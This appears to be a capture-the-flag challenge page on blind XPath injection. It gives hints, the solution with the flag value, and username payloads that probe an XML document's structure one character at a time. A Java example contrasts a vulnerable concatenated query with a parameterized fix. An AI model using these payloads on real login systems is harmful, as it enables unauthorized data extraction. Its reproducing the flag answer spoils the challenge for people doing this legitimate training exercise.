Xpath

Schema recovery


select * from information_schema.xml

Can you exfiltrate the full XML structure with only a blind XPath injection?

Goal: find the hidden node starting with FLAG-

The format is FLAG-\d+

Hints

Hint #1

You can read the name of a node with the name() function.

For example:

name(/db) = 'db' is true

Hint #2

You can use /* to match any child.

Hint #3

You can use the position of the node in its parent as a filter: /db/users/user[position() = 42]

Solution

Read the solution

$user = a' or name(/db/*[position() = 2]) = "FLAG-5468421" and '1 -> true

Explanation

First, you can get the number of children of a node with this query:

$user = a' or count(/*) = 1 and '1 -> true

$user = a' or count(/db/*) = 1 and '1 -> false

$user = a' or count(/db/*) = 2 and '1 -> true

Next you need to find the name of the node. By using the substring function it is possible to test each character separately.

$user = a' or substring(name(/db/*[position() = 2]), 1, 1) = "A" and '1 -> false

$user = a' or substring(name(/db/*[position() = 2]), 1, 1) = "F" and '1 -> true

$user = a' or substring(name(/db/*[position() = 2]), 1, 2) = "FL" and '1 -> true

By doing this recursively you can recover the full XML structure.
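As an added example that is not part of the challenge, here is how the boolean oracle above arises in a Java application using javax.xml.xpath, with the string-concatenated query beside a parameterized one that binds the input to the XPath variable $user. The sample document, its element names, and the single-parameter login query are assumptions made for the demonstration.

```java
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class XPathOracle {
    // Constructed sample document (assumption): a users branch plus a second
    // child whose name is the secret. The value is a placeholder, not the flag.
    static final String XML =
        "<db><users><user>alice</user></users><FLAG-0000000/></db>";

    // Vulnerable: the untrusted value is concatenated into the expression, so a
    // quote-breaking input rewrites the predicate and the true/false result
    // of the login check becomes a blind oracle over the whole document.
    static boolean vulnerableLogin(Document doc, String user) throws Exception {
        String expr = "boolean(/db/users/user[text()='" + user + "'])";
        XPath xp = XPathFactory.newInstance().newXPath();
        return (Boolean) xp.evaluate(expr, doc, XPathConstants.BOOLEAN);
    }

    // Hardened: the value is bound to $user through a variable resolver, so it
    // is always treated as data and can never alter the expression structure.
    static boolean hardenedLogin(Document doc, String user) throws Exception {
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(name ->
            "user".equals(name.getLocalPart()) ? user : null);
        XPathExpression compiled =
            xp.compile("boolean(/db/users/user[text()=$user])");
        return (Boolean) compiled.evaluate(doc, XPathConstants.BOOLEAN);
    }

    public static void main(String[] args) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
            .parse(new ByteArrayInputStream(XML.getBytes(StandardCharsets.UTF_8)));
        // The count(/db/*) = 2 probe from the explanation above.
        String probe = "a' or count(/db/*) = 2 and '1";
        System.out.println("vulnerable: " + vulnerableLogin(doc, probe)); // true
        System.out.println("hardened:   " + hardenedLogin(doc, probe));   // false
    }
}
```

With the parameterized form the same input is simply compared against the user text and no longer leaks anything about the rest of the document.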
